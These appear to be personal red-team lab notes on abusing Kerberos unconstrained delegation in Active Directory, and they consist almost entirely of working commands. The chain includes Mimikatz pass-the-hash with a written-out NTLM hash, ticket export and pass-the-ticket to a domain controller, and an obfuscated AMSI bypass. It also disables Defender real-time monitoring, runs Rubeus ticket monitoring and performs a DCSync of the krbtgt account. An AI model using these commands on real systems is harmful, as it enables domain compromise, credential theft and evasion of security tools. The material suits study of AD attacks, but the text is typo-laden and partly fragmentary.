Find Serrvers that has uncontrained delegatin

Get-NetComputer -Unconstrained | select -ExpandProperty name

We need to have local admin priv

Elevate To Admin Access

. .\\Invoke-Mimikatz.ps1

Invoke-Mimikatz -Command '"sekurlsa::pth /user:appadmin /domain:dollarcorp.moneycorp.local /ntlm:d549831a955fee51a43c83efb3928fa7 /run:powershell.exe"'

Mimikatz On Session

powershell -ep bypass

$sess = New-PSSession -ComputerName dcorp-appsrv.dollarcorp.moneycorp.local

Enter-PSSession -Session $sess

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

exit

Invoke-Command -FilePath C:\\AD\\Tools\\Invoke-Mimikatz.ps1 -Session $sess

Enter-PSSession -Session $sess

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

ls | select name

When we don't see a ticket, we need to trick DA

Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose

Export The Admin Ticket

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Invoke-Mimikatz -Command '"kerberos::ptt C:\\Users\\appadmin\\Documents\\user648\\[0;334d6c]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbii"'

ls | select name

Invoke-Command -ScriptBlock{whoami;hostname} -computername dcorp-dc

Using Rubeus Monitor For Authentication

Set-MpPreference -DisableRealtimeMonitoring $true

Copy-Item -ToSession $appsrv1 -Path C:\\AD\\Tools\\Rubeus.exe -Destination C:\\Users\\appadmin\\Downloads

.\\Rubeus.exe monitor /interval:5/nowrap

. .\\Invoke-Mimikatz.ps1

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\\krbtgt"'

Hunting in Active Directory: Unconstrained Delegation & Forests Trusts

Kerberos Unconstrained Delegation